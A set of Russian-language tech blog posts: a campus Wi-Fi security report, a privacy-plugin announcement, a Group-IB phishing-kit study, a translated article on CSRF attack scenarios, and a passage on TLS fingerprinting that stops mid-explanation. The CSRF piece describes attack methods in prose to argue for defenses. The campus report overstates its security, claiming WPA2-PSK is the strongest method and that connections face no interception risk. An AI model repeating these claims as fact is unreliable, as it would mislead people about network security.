Для защиты устройств от студентов, или потенциальных злоумышленников были проведены комплексные меры безопасности оборудования. А именно: расположение точек доступа выше 2,5 метров (на стенах, или потолке), скрытия линий питания и передачи данных в кабель-каналах (кабельтонах) на той же высоте, создание контролируемых (открытых) и неконтролируемых (закрытых) линий коммутации данных и питания на каждом этаже в закрытых серверных комнатах с ограниченной формой допуска (коробки коммутации).

Особенностью реализованной системы есть то, что она комбинирует в себе как безопасную беспроводную связь с помощью радио-частотного канала, а также является их защищенность посредством использования непрерывного контроля со стороны сервера на основе системы Ubiquiti CloudKey. Внешний вид сервера и типичная схема подключения изображена на рис 1.12.

С помощью этого сервера обеспечивается постоянный контроль и мониторинг входных и выходных данных. В частности формируется отчетная статистика, благодаря её помощи реализована система блокировки подозрительного трафика сети. Применяется шифрование и Secure Sockets Layer (SSL) сертификация. Это обеспечивает конфиденциальность обмена данными между клиентом и сервером с помощью Transmission Control Protocol / Internet Protocol (TCP / IP).

Защита сервера управления системой надёжно зашифрована с помощью биометрической защиты панели администрирования (сканирование отпечатка пальцев, сканирование лица, рис. 1.13).

Защита беспроводной сети Wi-Fi реализована с помощью метода шифрования WPA2-PSK с использованием пароля более 10 символов, который на сегодня является наиболее криптостойким алгоритмом аутентификации устройств.

Благодаря данным мерам каждый студент и любой преподаватель учебного заведения могут подключиться к сети интернет, а главное, это подключение защищено и безопасно, а также не имеет в себе угроз и рисков перехвата, то есть злоумышленники не получают доступ к передаваемой информации.

Итоги

На базе современного развития цифровых методов, компьютерных и телекоммуникационных систем, а также сетей, была поставлена цель и реализованы задачи технического оснащения дистанционного обучения, позволяющие обеспечивать не только локальное, но дистанционное обучение студентов с учётом необходимых консультаций и демонстраций через, например , Zoom, Skype, Discord конференции, что является актуальным в период карантина, связанного с коронавирусом. В ходе этих задач были рассмотрены и получены следующие результаты:

- проведён анализ информационно-технических систем высших учебных заведений, по результатам которого дальше использовали современные мировые информационно-технические сервисы такие как Google Classroom, Zoom конференции, Skype, Google Hangouts, Prometheus, SuperMemo, Stepik, Coursera, SoloLearn, Brain Code. Проведено сравнение преимуществ и недостатков (плюсы и минусы) современного состояния этих методов ДО;

- формализованы требования к защите информации в информационно-технических системах и выбора методик защищенность и конфиденциальности информации, то есть информационно-технические системы высших учебных заведений должны отвечать современным требованиям помехозащищенности и безопасности функционирования с учетом надежного обеспечения конфиденциальности, доступности и целостности учебной, научной и административной информации . В связи с чем предложенный метод криптографической сокрытие информации и защиты источников питания от несанкционированного доступа;

- в будущем озвученные ИТС и их структуру можно масштабировать на спутниковый уровень (ретрансляционный) для покрытия больших территорий.

Особая благодарность в.о. зав.кафедры кибербезопасности УТДФ Прокопович-Ткаченко Дмитрию Игоревичу за предоставленные возможности для создания ИТС, доценту кафедры кибербезопасности Тарасенко Юрию Станиславовичу за помощь с оформлением и расчётами, а также студентам Олейнику Александру, Рудакову Михаилу и Луценко Владимиру за оказанную помощь в прокладке линий коммуникации!

Спасибо за внимание!

Подробнее..

Recovery mode Nemezida DNT

26.03.2021 22:10:30 | Автор: admin

Большинство интернет-компаний в сети отслеживают не только личную жизнь пользователей, но и корпоративные данные сотрудников и собирают излишнюю информацию.

Это происходит без четкого контроля, что с этими данными в дальнейшем происходит и кто получает к ним доступ.

Так-как большинство программ, с помощью которых пользователь использует интернет, сами собирают информацию о пользователях, необходимо быть уверенным в выбранном решении и отсутствии незапротоколированных возможностей.

В этом посте хотим рассказать о стартапе который хочет решить эту задачу.

Nemezida DNT плагин, направленный на защиту пользователя и устройства от сбора информации, выполняющий функции проверки сайтов на наличие вредоносного кода и их репутации.

Проект Nemezida DNT занял призовое место в недавно завершившемся Хакатоне Demhack 2, посвященному теме Приватность и доступность информации.

На текущий момент стартап имеет довольно ограниченный набор функций, но у его разработчиков большие планы и планируется увеличение функционала в несколько раз.

Принцип работы плагина заключается в том, что когда пользователь со своего устройства осуществляет сёрфинг в сети интернет, посещаемые ресурсы пытаются вытащить из устройства, как можно больше данных о нем и о пользователе, плагин осуществляет подмену этих данных на очень похожие, что помогает обойти плагину обнаружение со стороны различных сервисов, помимо прочего, плагин осуществляет блокировку отправки информации, которую он подменить не может.

На данном этапе у продукта следующие функции:

Режим защиты "Перископная":

- Fingerprint;

Режим защиты Рабочая:

- Fingerprint;

- Cookie.

Режим защиты Предельная:

- Fingerprint;

- Cookie;

- Geo;

- Антивирусная проверка ссылок;

- Подмена информации об установленных плагинах;

- Проверка репутации посещенных сайтов.

На картинке снизу Вы можете увидеть интерфейс данной разработки. При нажатии на кнопку "Пуск" происходит погружение батискафа в воду. что говорит о том, что плагин начал свою работу.

При переходе в режим "Настройки", пользователь может выбрать один из трех режимов работы.

Помимо прочего, плагин имеет режим обратной связи с разработчиками, что позволяет своевременно решать возникшие вопросы по продукту.

Работа плагина поддерживается в нескольких десятках браузерах, например, в таких, как: "Google Chrome, Яндекс Браузер, Opera и других ".

Плагин помогает частично обеспечить исполнение 23 статьи Конституции РФ и пунктов 152 ФЗ О персональных данных и Европейского закона о защите персональных данных "GDPR", таким образом решение нацелено защитить не только домашнего, но и корпоративного пользователя.

В будущем стартап хочет глубже проработать вопрос защиты персональных данных, коммерческой и конфиденциальной информации.

А, как думаете, Nemezida DNT мог бы быть полезен домашним и корпоративным пользователям? Какие бы хотели видеть функции? Давайте подискутируем в комментариях.

Подробнее..

Group-IB обнаружила фишинг-киты, нацеленные на 260 брендов

07.04.2021 14:14:13 | Автор: admin

Команда CERT-GIB (Центр мониторинга и реагирования на инциденты информационной безопасности Group-IB) проанализировала инструменты для создания фишинговых страниц, так называемые, фишинг-киты, и выяснила, что в 2020-м году с их помощью фишинговые сайты чаще всего создавались под различные онлайн-сервисы (онлайн-шоппинг, онлайн-кинотеатры и др.), электронную почту, а также под финансовые организации. Суммарно Group-IB обнаружила фишинг-киты, нацеленные свыше чем на 260 уникальных брендов в России и за рубежом.

Фишинг-кит это набор готовых инструментов для создания и запуска фишинговых веб-страниц, подделанных под сайт конкретной компании или нескольких сразу. Как правило, фишинг-киты продаются в даркнете, на специализированных форумах. С их помощью преступники, не обладающие глубокими навыками программирования, могут легко разворачивать инфраструктуру для масштабных фишинговых атак и быстро возобновлять ее работу в случае блокировки. Исследователям по кибербезопасности фишинг-киты интересны прежде всего тем, что анализ одного такого набора позволяет разобраться в механизме реализации фишинговой атаки и установить, куда отправляются похищенные данные. Помимо этого, исследование фишинг-китов зачастую помогает обнаружить цифровые следы, ведущие к разработчикам такого товара.

Как и в 2019 году, главной мишенью фишеров были онлайн-сервисы (30.7%): похищая учетные данные пользовательских аккаунтов, злоумышленники получали доступ к данным привязанных банковских карт. Привлекательность почтовых сервисов для атак в прошлом году снизилась, а доля фишинг-китов, нацеленных на них, сократилась до 22.8%. Тройку замыкают финансовые учреждения, на которые приходится немногим более 20%. В2020 году наиболее часто эксплуатируемыми вфишинговых наборах брендами были Microsoft, PayPal, Google и Yahoo.

Данные, которые пользователь вводит на фишинговым сайте, злоумышленник получает не сразу: сначала они записываются в локальный файл, после чего главной задачей становится извлечение похищенного. Чаще всего для пересылки таких данных используются почтовые адреса, зарегистрированные на бесплатных сервисах электронной почты. Они составляют 66% от общего числа адресов, найденных в фишинговых наборах. Наиболее распространены аккаунты на Gmail и Yandex.

Альтернативный путь

Эксперты Group-IB обнаружили, что украденные в результате фишинговых атак данные пользователей все чаще выгружаются не только с помощью электронной почты, но и таких легитимных сервисов, как Google-формы и мессенджер Telegram. Альтернативные способы доставки украденных с помощью фишинга данных позволяют злоумышленникам обеспечить их сохранность и оперативность использования. Telegram-боты также применяются киберпреступниками в готовых платформах для автоматизации фишинга, доступных в даркнете: в них на основе ботов реализована административная часть, с помощью которой контролируется весь процесс фишинговой атаки и ведется учет похищенных денег. Такие платформы распространяются по формату cybercrime-as-a-service, за счет чего растет количество атакующих группировок и масштаб преступного бизнеса.

Альтернативные пути получения украденных злоумышленниками данных можно разделить на локальные, когда они записываются в файл, расположенный на самом фишинговом ресурсе, и удаленные когда они отправляются на сторонний сервер. Для передачи украденных данных злоумышленники активно используют легитимные сервисы. Так, в прошлом году началось широкое применение в фишинговых наборах Google-форм, а также выгрузка украденных данных в специально созданные приватные Telegram-боты. Суммарно на альтернативные способы пока приходится порядка 6%, но вероятнее всего их доля будет расти, а основное увеличение придется на Telegram в силу простоты реализации схемы и анонимности мессенджера.

Функциональность фишинг-китов не ограничивается созданием страниц для похищения данных пользователей: некоторые из них могут подгружать вредоносные файлы на устройство жертвы. Иногда продавцы наборов для фишинга обманывают своих же покупателей, пытаясь заработать на них дважды. Помимо продажи созданного ими вредоносного инструмента, они могут заинтересоваться и похищенными с его помощью данными. Используя специальный скрипт, встроенный в тело фиш-кита, они направляют поток украденных пользовательских данных себе или получают скрытый доступ к хостингу своего покупателя.

Фишинг-киты изменили правила игры в этом сегменте борьбы с киберпреступлениями: раньше злоумышленники прекращали свои кампании после блокировки мошеннических ресурсов и быстро переключались на другие бренды, сегодня они автоматизируют атаку, моментально выводя новые фишинговые страницы на смену заблокированным, комментирует заместитель руководителя CERT-GIB Ярослав Каргалев. Автоматизация таких атак, в свою очередь, приводит к распространению более сложной социальной инженерии, которая начинает применяться в масштабных атаках, а не в точечных, как было ранее.

Рекомендации для бизнеса и пользователей

Бороться с продвинутыми фишинговыми схемами с помощью классического мониторинга и блокировки недостаточно, необходимо выявлять все элементы инфраструктуры атакующих, блокируя не отдельные фишинговые страницы, а сеть мошеннических ресурсов целиком. Система Group-IB Threat Intelligence & Attribution проводит анализ фишинговых атак и атрибутирует их до конкретной преступной группы, выявляя все созданные ей ресурсы. В системе Group-IB Threat Intelligence & Attribution аккумулирована обширная база фишинговых наборов, что позволяет компании бороться сфишингом, нацеленным наконкретный бренд. Данная база регулярно обогащается: как только система обнаруживает фишинговую страницу, соответствующий сервер сканируется наналичие фишинговых наборов, доступ к которым позволяет определить, были ли данные скомпрометированы и куда они передавались.

Рекомендации для бизнеса по борьбе с фишингом и фишинг-китами

  • Для пресечения подобных продвинутых фишинговых схем классического мониторинга и блокировки уже недостаточно необходимо выявлять и блокировать инфраструктуру преступных групп, используя автоматизированную систему выявления и устранения цифровых рисков на основе искусственного интеллекта (подробности тут), база знаний которой регулярно подпитывается данными об инфраструктуре, тактике, инструментах и новых схемах мошенничества.

  • Использовать специализированные системы, позволяющие проактивно выявлять появление поддельных доменов, мошеннической рекламы и фишинга.

  • Обеспечить непрерывный мониторинг андеграундных форумов на появление фактов, связанных с попытками использовать бренд в неправомерных целях.

  • Проводить анализ фишинговых атак, с целью атрибутировать преступную группу, раскрыть участников и привлечь к ответственности.

Рекомендации для пользователей по защите от фишинга

  • Не переходите по ссылкам, присланным в подозрительных или непонятных сообщениях электронной почты, соцсетях и мессенджерах.

  • Не загружайте вложенные файлы из сообщений, которых вы не ожидали.

  • Внимательно проанализируйте адрес сайта (URL), на который вы были переадресованы. В большинстве случаев фишинга URL-адрес отличается от оригинального домена одним знаком (например, заканчивается на .com вместо .gov или wiIdberries.ru вместо wildberries.ru с заглавной i вместо l).

  • Обновляйте браузер до последней версии.

  • Проверьте домен на сайте tcinet.ru. Там можно узнать дату регистрации: как правило, мошеннические сайты живут несколько дней.

  • Не совершайте онлайн-покупки по предоплате на непроверенных сайтах.

  • Для покупок в интернете используйте отдельную банковскую карту.

Подробнее..

Перевод Восемь забавных вещей, которые могут с вами произойти, если у вас нет защиты от CSRF-атак

12.04.2021 18:13:34 | Автор: admin

Восемь забавных вещей, которые могут с вами произойти, если у вас нет защиты от CSRF-атак



Введение


В качестве программистов Typeable мы видим свою основную цель в том, чтобы приносить пользу нашим заказчикам. Однако я только что потратил некоторое количество денег заказчика и целый день на то, чтобы добавить защиту от подделки межсайтовых запросов (CSRF) на нашу страницу авторизации и, надеюсь, сделал это без каких-либо видимых следов. Ценность таких действий по обеспечению безопасности бывает трудно увидеть, поэтому я подумал, что полезно было бы описать, что именно может произойти без защиты от CSRF, и почему это небольшое изменение на самом деле является очень ценным.


Во-первых, что такое CSRF-атака? Согласно первоначальному замыслу всемирная паутина должна быть наполнена взаимосвязанным контентом, где одна страница могла бы, например, показывать изображения с другой и ссылаться на другие страницы без каких-либо ограничений. За кулисами работает веб-браузер, загружающий различные ресурсы, делая запросы к серверам. Серверы декодируют запросы и выдают ответ, направляя соответствующий контент. Интернет не меняет состояние, а серверы изначально не знают цели запроса. Сервер понимает, что браузер запрашивает изображение Эйфелевой башни, но не знает, что браузер собирается использовать эту картинку при отображении статьи из Википедии.


В случае со статическим контентом эта схема позволяет легко построить сеть. Однако мы больше не используем интернет для статического контента в таком масштабе. С веб-приложениями такое поведение больше не работает. Сервер должен знать, с какой целью делается запрос. Если браузер запрашивает у банковского сервера перевод денежных средств, такой сервер должен знать, что это произошло из-за того, что пользователь нажал соответствующую кнопку на вебсайте банка, а не потому что он попал на другую, вредоносную, страницу, созданную для выдачи такого же запроса.


В этом заключается суть подделки межсайтовых запросов (CSRF). Если злоумышленник может заманить вашего пользователя на свой вебсайт, пока этот пользователь авторизован на вашем сайте, злоумышленник может подделывать запросы на ваш сайт, используя идентификационные данные такого пользователя. То есть теоретически злоумышленник может активировать любые функции, доступные этому пользователю. И хотя большинство браузеров и серверов учитывают такую возможность, готовые решения по снижению рисков не являются абсолютно надежными. Именно авторы приложений отвечают за то, чтобы обрабатывались только предполагаемые запросы.


С точки зрения злоумышленников использование CSRF связано со многими нюансами. Самым важным является то, что злоумышленники не могут видеть результат CSRF-запросов из-за мер безопасности, предусмотренных в браузере. Злоумышленникам приходится действовать вслепую. Во-вторых, злоумышленник должен суметь догадаться, как должен выглядеть запрос, что связано с трудностями использования путей для запросов, обычно недоступных простому пользователю. Подобные соображения могут стать причиной, по которой защита от CSRF не всегда рассматривается в качестве приоритетной задачи.


Однако с помощью CSRF-уязвимостей умный злоумышленник может сделать очень многое. Вот восемь очевидных действий для разных ситуаций:


1. Сделать слепой произвольный запрос по любому маршруту в качестве пользователя


В общем-то, это неинтересная и абстрактная угроза. И все же посмотрите на любое веб-приложение. Ведь непременно должно быть что-то неприятное, что можно сделать с помощью CSRF? Например, отправить компрометирующее сообщение от лица незадачливого пользователя или забронировать кому-нибудь билеты на рейс в Таджикистан? А если жертвой является администратор, возможно, злоумышленники могут присвоить себе статус привилегированного пользователя?


2. Сделать запрос и узнать его продолжительность


Несмотря на то, что злоумышленники не могут увидеть реальный ответ, они обычно могут установить продолжительность его выдачи. От атак по времени очень трудно защититься, и мы берем на себя этот труд только в важнейших местах, таких как страница авторизации.


Однако никто серьезно не защищается от атак по времени, скажем, при поиске. Например, предположим, что у вас есть сайт службы знакомств, а злоумышленник делает запрос через браузер жертвы, скажем, Сары, по маршрутам messages/search?query=kevin%20mitchell и messages/search?query=blurghafest. Если достоверно известно, что первый запрос занимает больше времени, чем второй (причем необязательно намного), может пролиться кровь. Или, как минимум, где-то далеко произойдет неприятность и появится недовольный клиент.


С помощью этого способа также можно тайно проверить, есть ли у кого-либо учетная запись в какой-то конкретной службе. Надо всего лишь осуществить CSRF-атаку на медленном маршруте, доступном только для авторизованных пользователей. Если пользователь авторизован, это займет больше времени.


3. Заставить пользователя выйти из системы


Страницы выхода из системы зачастую не защищены от CSRF-атак, так как важно дать пользователям возможность выйти из учетной записи в любой ситуации. Сюда входят ситуации, когда пользователь отключает файл CSRF cookie, используя инструментарий разработчика. Если во главу угла ставится возможность выхода из системы, страницы выхода из учетной записи становятся хорошей целью для CSRF-атак.


Например, вам будет совсем не смешно, если перекупщик заставит всех пользователей вашего веб-форума выйти из вашего интернет-магазина как раз в то время, когда в продажу поступит новая редкая игровая консоль.


4. Заставить пользователя выйти из системы и снова войти


Страницы авторизации зачастую представляют собой отдельный случай в схемах защиты от CSRF. Как правило, CSRF-атака отслеживается в данных пользовательского сеанса, а поскольку на странице авторизации сеанс еще не происходит, страницу авторизации можно оставить без защиты.


В этом сценарии злоумышленник сначала обеспечивает выход пользователя из системы, а затем пытается снова войти. Теперь для того, чтобы авторизовать пользователя снова, злоумышленнику потребовались бы учетные данные пользователя и пароль, которых, надо надеяться, у злоумышленника нет. Вместо этого злоумышленник может снова авторизовать пользователя в системе, используя идентификационные данные злоумышленника. Для чего это нужно?


Предположим, например, что на этом вебсайте для чего-то нужны данные банковской карты. Когда пользователь непреднамеренно авторизуется в учетной записи злоумышленника, в ней не будет данных кредитной карты. Поэтому для того, чтобы выполнить запланированные пользователем действия, например, попытаться купить приставку ps5, пользователь должен снова ввести номер кредитной карты. Однако если сейчас пользователь введет номер, этот номер будет связан с учетной записью злоумышленника, с которой злоумышленник легко его украдет.


5. Изменить адрес электронной почты пользователя и запросить восстановление пароля


В большинстве случаев обновление данных учетной записи пользователя осуществляется с помощью единственного запроса. Если вы сможете произвести CSRF-атаку на этот запрос, вы сможете менять такие вещи, как электронный адрес пользователя. Если это произошло, злоумышленник может просто пойти на страницу авторизации и запустить процесс смены пароля и украсть учетную запись пользователя.


А если изменить электронную почту не получилось, злоумышленник может попытаться поменять такие элементы, как номер телефона или кредитной карты, которые система поддержки использует для идентификации пользователей, когда они звонят. Возможно, теперь злоумышленник может обмануть сотрудников поддержки, чтобы они выдали ему данные учетной записи пользователя?


6. Превратить уязвимость Self-XSS в XSS


CSRF-атака может превратить уязвимость self-XSS, которая является мелкой проблемой, в XSS, которая является огромной проблемой.


На каком-то этапе развития сети появился Javascript, позволяющий добавить на страницы интерактивность. Позднее Javascript был расширен, чтобы дать скрипту все возможности действовать от лица пользователей на любом сайте, где он выполняется. Это привело к появлению уязвимостей, связанных с межсайтовым скриптингом.


Истинная уязвимость XSS представляет собой ужасную ситуацию, при которой злоумышленник каким-то образом смог заставить браузер жертвы выполнять вредоносный код на javascript. Это означает, что система защиты разгромлена, поскольку злоумышленник получил полный неограниченный доступ ко всему, что пользователь может делать на вашем сайте, что зачастую включает распространение XSS-атаки на других пользователей.


Уязвимость Self-XSS представляет собой значительно меньшую угрозу безопасности. В этом случае пользователи могут вставлять скрипты в веб-сайт, но эти скрипты видны только при использовании собственных учетных записей этих пользователей, а не учетных записей других пользователей. Таким образом, в самом неприятном случае пользователь может причинить ущерб самому себе.


Вот реальный пример уязвимости Self-XSS. Несколько лет назад я обнаружил, что система записи на курсы в моем университете имеет страницу с описанием курсов, в которую можно вписывать скрипты. Этот момент считался несущественным, поскольку на этой странице могли писать только преподаватели, а они вряд ли стали бы добавлять сюда вредоносные скрипты.


К сожалению, в системе также отсутствовала защита от CSRF-атак, следовательно, злоумышленник мог бы вставить скрипт Javascript на страницах с описанием курса с помощью CSRF: Надо всего лишь попросить любого преподавателя проверить вашу курсовую и можно быть уверенным, что и преподаватель, и злоумышленник вошли в систему и просматривают страницу с вашей вредоносной CSRF-страницей. Затем в течение 20 миллисекунд вы можете пройти все курсы с высшим баллом.


7. Замести следы


Если злоумышленник также является пользователем атакуемого веб-приложения, CSRF-атака становится хорошим способом скрыть следы. Хотите вставить XSS-скрипт в сообщение на форуме, но не хотите делать это под собственной учетной записью, чтобы не попасться? В таком случае совершите CSRF-атаку на другого пользователя и используйте его браузер и идентификационные данные для вставки XSS.


Если пользователь не обладает по-настоящему глубоким пониманием, он никогда не узнает, откуда пришел этот CSRF-удар.


8. Распространять вредоносное ПО


Позволяет ли ваш сервис пользователям хранить файлы? Многие типы файлов, такие как .docx, pdf, jpeg и другие исторически используются для сокрытия вредоносного ПО из-за багов программ, которые их читают.


Если сервис уязвим для CSRF-атак, злоумышленник может затем загрузить поврежденные файлы в учетные записи пользователей, а пользователи откроют их на своих телефонах и ноутбуках.


Заключительные замечания


Надеюсь, мне удалось убедить вас, что полдня, потраченные мной на внедрение защиты от CSRF, на самом деле были прекрасным вложением для нашего заказчика. А также убедить, что сейчас самое время пойти и добавить защиту от CSRF на ваш сайт, если вы до сих пор этого не сделали.

Подробнее..

Recovery mode Nemezida DNT плагин, для защиты от сбора информации

26.04.2021 08:11:20 | Автор: admin

Здравствуй, уважаемый читатель!

Многие из нас слышали о слежке за пользователями в интернете и о сборе персональных данных, некоторые сталкивались с этим не понаслышке.

Неважно, являетесь вы домашним или корпоративным пользователем, все мы посещаем различные сайты, которые в той или иной мере вытягивают с наших устройств информацию о нас. Еще больше данных о себе и своем устройстве вы отдаёте, посещая вредоносные сайты.

Собирая эти данные и обрабатывая их, тот, кто ими завладел, может составить ваш цифровой портрет, состоящий из цифровых отпечатков или следов, оставленных в сети и этим уже занимаются злоумышленники, взломавшие 120 рекламных серверов.

Согласно результатам исследованияEFF (Electronic Frontier Foundation), уникальность отпечатка браузера очень высока, и он содержит в себе нижеописанные данные:

  • user-agent (включая не только браузер, но и версию ОС, тип устройства, языковые настройки, панели инструментов и т.п.);

  • часовой пояс;

  • разрешение экрана и глубину цвета;

  • supercookies;

  • настройки cookie;

  • системные шрифты;

  • плагины к браузеру и их версии;

  • журнал посещений;

  • другие данные.

    Если говорить о статистике, то только раз на 286 777 случаев случается полное совпадение отпечатков браузеров двух разных пользователей.

Согласно ещеодному исследованию, точность идентификации пользователя при помощи отпечатка браузера составляет 99,24%.

Рассмотрим вершину айсберга и приведём простые примеры, что может случиться с собираемыми о вас данными:

сбор данных для ведения статистики;

сбор данных для показа рекламы;

сбор данных для продажи организациям;

сбор данных для осуществления незаконных действий;

сбор данных для проведения целенаправленных атак;

сбор данных для кражи и мошенничества;

многое другое.

А контролируете ли вы передачу этих данных, если да, то как? Какими средствами защиты информации и плагинами вы пользуетесь? На этот вопрос каждый из вас может ответить в комментариях.

Если еще сильнее углубиться в данную проблему, то какие данные могут утекать не только у обычных домашних пользователей, но и у сотрудников компаний? И к чему это может привести? Чтобы ответить на этот вопрос, предлагаю ознакомиться с рисунком 1.

Рисунок 1 Схема формирования цифрового портретаРисунок 1 Схема формирования цифрового портрета

Многие из нас сталкивались с различными проблемами и неприятностями в офисе, и для наилучшего решения этих проблем некоторые прибегают к поиску решения в сети.

Ряд сотрудников IT, юридического, финансового и других отделов уже понимают, о чём речь. И эту информацию мы тоже отдаем неизвестным нам ресурсам, трекерам и маячкам, не говоря уже о злоумышленниках.

А теперь, зная ваш цифровой портрет и владея информацией о проблемах в организации и ее уязвимых точках, что с ней может сделать злоумышленник? Вопрос риторический.

Под прицелом остаются организации, ведущие разработки для оборонно-промышленного комплекса, космонавтики, медицины, научной деятельности и т.д.

Многие компании и их сотрудники становятся уязвимыми для целенаправленных ATP-атак, а это уже влечет за собой более крупные риски и ущерб. Готовы ли мы принимать эти риски?

Согласно проведённому мной опросу, многие руководители, специалисты и рядовые граждане не готовы к этим рискам, так как при их возникновении они сталкиваются или могут столкнуться с рядом проблем:

понижение заработной платы;

лишение премии;

увольнение с работы;

финансовые и репутационные риски организации.

На рисунке ниже вы можете ознакомиться с данными компании PositiveTechnologies за 2019 год и сделать выводы о типах украденных данных. Для статистики были взяты данные за 2019 год, так как отчет за весь 2020 год от PositiveTechnologies еще не сформирован.

Рисунок 2 Типы украденных данных за 2019 годРисунок 2 Типы украденных данных за 2019 год

Этот вопрос мы прояснили, но давайте постараемся ответить на вопрос А как эти данные крадутся ещё?. Для ответа на этот вопрос мы обратимся к статистике от той же организации и рассмотрим ее на рисунке 3.

Рисунок 3 Способы распространения ВПОРисунок 3 Способы распространения ВПО

Помимо сбора информации о нас для формирования цифрового портрета, данные о нас собирают вредоносные сайты, которые не всегда блокируются средствами защиты информации, некоторые даже не оповещают об этом и для закрытия этого вектора угроз нужна эшелонированная защита. На рисунке 3 мы видим, что первые два места по распространению вредоносного ПО занимают веб-сайты и электронная почта.

Для решения этих проблем была начата разработка двух версий продукта Nemezida DNT:

Nemezida DNT Enterprise Edition версия продукта, созданная для более глубокой защиты компаний и корпоративного пользователя.

Nemezida DNT Home Edition бесплатная версия для домашнего пользователя с функцией режима защиты Перископная. Начиная с режима защиты Рабочая, продукт будет монетизироваться.

На рисунке 4 вы можете ознакомиться c функциями продукта, которые планируются к реализации, часть из них уже реализованы.

Рисунок 4 Набор функций в Nemezida DNTРисунок 4 Набор функций в Nemezida DNT

На текущий момент у нас реализован следующий функционал:

подмена Fingerprint;

подмена cookie;

подмена user agent;

VirusTotal;

Cisco Talos.

Последние два модуля будут доработаны, в частности, будет больше информативности о посещенном сайте, также посещение вредоносного сайта будет блокироваться.

Особенность нашей разработки заключается в мультифункциональности, она показана на рисунке 5.

Рисунок 5 Особенности Nemezida DNTРисунок 5 Особенности Nemezida DNTРисунок 6 Список поддерживаемых браузеровРисунок 6 Список поддерживаемых браузеров

Нашими дизайнерами было создано несколько тем для нашего плагина, Home Edition и Enterprise Edition. На рисунке 7 Вы можете ознакомиться с Home Edition темой нашего плагина, она будет доступна по умолчанию для всех режимов защиты, но сменить ее можно будет на другую, только имея лицензию с уровня защиты Рабочая.

Рисунок 7 Дизайн Home EditionРисунок 7 Дизайн Home Edition

Для версии Nemezida DNT Enterprise Edition была разработана тема в трех тонах: Белый, Черный, Синий, с которыми вы можете ознакомиться на рисунках 8, 9 и 10.

Рисунок 8 Белая тема Enterprise EditionРисунок 8 Белая тема Enterprise EditionРисунок 9 Черная тема Enterprise EditionРисунок 9 Черная тема Enterprise EditionРисунок 10 Черная тема Enterprise EditionРисунок 10 Черная тема Enterprise Edition

Перед каждым релизом мы будем тщательно проверять наш продукт на наличие уязвимостей и устранять их в случае, если такие будут найдены. Помимо прочего мы начали писать серверную часть, которая будет заниматься сверкой лицензионных ключей. Важно понимать, что ни наш продукт, ни мы не будем заниматься сбором и накоплением данных, в этом вы и сами сможете убедиться при проверке работы продукта в Wireshark, когда продукт выйдет в релиз.

Многие интересовались, на каком стеке мы ведем разработку нашего продукта, ответ на этот вопрос находится на рисунке 11.

Рисунок 11 Используемый стек технологийРисунок 11 Используемый стек технологий

Ниже вы можете ознакомиться с членами нашей команды, которые участвуют в разработке решения.

Выйти в релиз мы планируем через 3-4 месяца благодаря вашей обратной связи о нашем проекте, прохождению опроса и поддержке разработки на платформе Boomstarter.

В комментариях к этой статье вы можете оставить обратную связь, поделиться информацией, как вы решаете описанную в статье проблему, является ли это для вас реальной проблемой, какие средства защиты используете и какие у них есть плюсы и минусы для вас как для пользователя.

Спасибо за внимание!

Подробнее..

Использование TLS fingerprinting для выявления угроз

31.05.2021 14:10:41 | Автор: admin

В статье хотим рассказать про технологию TLS fingerprinting, про которую недостаточно материалов в русскоязычном сегменте. Попробуем это исправить. Статья частично переводит тематические материалы авторов описываемых методов (тут и тут), а также содержит описание практической реализации от Акрибии.

Не будем глубоко погружаться в детали работы SSL/TLS (далее будем говорить TLS), но кратко поясним детали.

Использование TLS само по себе благо, так как с его помощью шифруются данные. Но с обратной стороны создатели вредоносов используют его же, чтобы скрываться в шифрованном трафике (в данной статье как раз будет уклон в эту сторону) и затруднять их обнаружение и нейтрализацию.

Чтобы инициировать сеанс TLS, клиент отправляет пакет приветствия серверу после трёхстороннего установления связи TCP. Этот пакет и способ его создания зависят от пакетов и методов шифрования, используемых при создании клиентского приложения. Если сервер принимает соединение TLS, он ответит пакетом приветствия, тем самым продолжая согласование шифрования.

Поскольку согласование шифрования TLS передаётся в открытом виде, то можно отследить и идентифицировать клиентские приложения.

В этом и суть технологии TLS fingerprinting, если кратко. А теперь немного подробнее.

TLS fingerprinting

Суть технологии в захвате элементов пакета приветствия клиента, которые остаются статичными от сеанса к сеансу для каждого клиента. На их основе можно создать отпечаток пальца для распознавания конкретного клиента в последующих сеансах. Записываются следующие поля:

  • версия TLS;

  • версия записи TLS;

  • наборы шифров;

  • параметры сжатия;

  • список расширений.

Кроме того, данные собираются из трех конкретных расширений (если они доступны):

  • алгоритмы подписи;

  • алгоритм для шифрования данных;

  • хэш функция для проверки содержимого.

Использование такого набора данных позволяет с большой точностью идентифицировать используемый клиент (например, браузер).

Почему это круто:

  • Пакет приветствия клиента это первый пакет в любом TLS-соединении. Это позволяет принимать решение о последующих мерах в начале сеанса до того, как потребуется подмена протокола или эмуляция.

  • Можно захватывать пакеты приветствия клиента TLS с высокой степенью точности по всем портам с абсолютно нулевым требованием для захвата обоих направлений потока. Это означает, что датчики в среде с асимметричной маршрутизацией или с ограничениями ресурсов, потенциально вызывающими отбрасывание пакетов, все равно могут собирать пакеты приветствия клиента, независимо от того, были ли они скрыты из-за работы на нестандартных портах.

  • Пакеты приветствия клиента возникают достаточно редко, поэтому дополнительная обработка хэшей не повлечет значительных затрат.

Наиболее очевидное использование TLS Fingerprinting пассивное обнаружение. Технология позволяет обнаруживать широкий спектр потенциально нежелательного трафика, не требуя доступа к конечным точкам. Можно обнаруживать как конкретные вредоносы по их поведению и/или обращениям к командным центрам, так и обычный софт, используемый не по назначению или в обход действующих правил.

Например, к серверу Exchange могут обращаться только почтовые клиенты или браузер, если используется OWA, поэтому соединение из скрипта на Python будет подозрительным.

Итого: TLS Fingerprinting предназначен для быстрой идентификации известных TLS-соединений и отслеживания неизвестных TLS-соединений. Входные данные принимаются либо посредством прослушивания трафика, либо при чтении PCAP файлов.

Есть несколько готовых реализаций, наиболее поддерживаемых комьюнити:

  • пассивный метод с использованием хэшей JA3 и JA3S;

  • активный инструмент снятия отпечатков пальцев с сервера TLS хэши JARM.

JA3 и JA3S

Метод JA3 используется для сбора десятичных значений байтов для следующих полей в пакете приветствия клиента: версия TLS, набор шифров, список расширений протоколов TLS, эллиптические кривые и форматы эллиптических кривых. Затем он объединяет эти значения вместе по порядку, используя символ , для разграничения каждого поля и - для разграничения каждого значения в каждом поле.

Порядок полей следующий:

TLSVersion,Ciphers,Extensions,EllipticCurves,EllipticCurvePointFormats

Пример:

771,49196-49162-49195-52393-49161-49200-49172-49199-52392-49171-159-57-56-107-158-52394-51-50-103-22-19-157-53-61-156-47-60-10,0-23-65281-10-11-13-28,29-23-24-25,0

Если в ClientHello нет расширений TLS, поля остаются пустыми:

